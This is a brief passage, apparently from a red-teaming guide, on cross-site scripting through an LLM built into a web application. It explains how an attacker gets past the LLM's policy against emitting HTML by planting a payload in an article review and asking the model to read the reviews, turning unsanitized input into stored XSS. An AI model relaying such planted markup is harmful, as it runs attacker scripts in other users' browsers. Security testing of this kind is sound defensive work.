π Cross-Site Scripting β
β¨ Cross-Site Scripting via LLM Responses β
Imagine an attacker interacting with an LLM integrated into a web application that displays user-generated content. The attackerβs goal is to inject a malicious script through the LLMβs response that will be executed when viewed in a web browser.
The attacker starts by crafting a message to the LLM with the intent to get it to produce a response containing an XSS payload. We also note that the user input is not sanitized either, which allows us to have a stored XSS.

The LLM policy doesn't allow us to directly write HTML code that will be interpreted by the browser. However, we can indirectly bypass this policy.
We could then leave an html payload in a review field of an article on the platform and ask the LLM to read the reviews of this article. In this indirect way, it won't block the request.


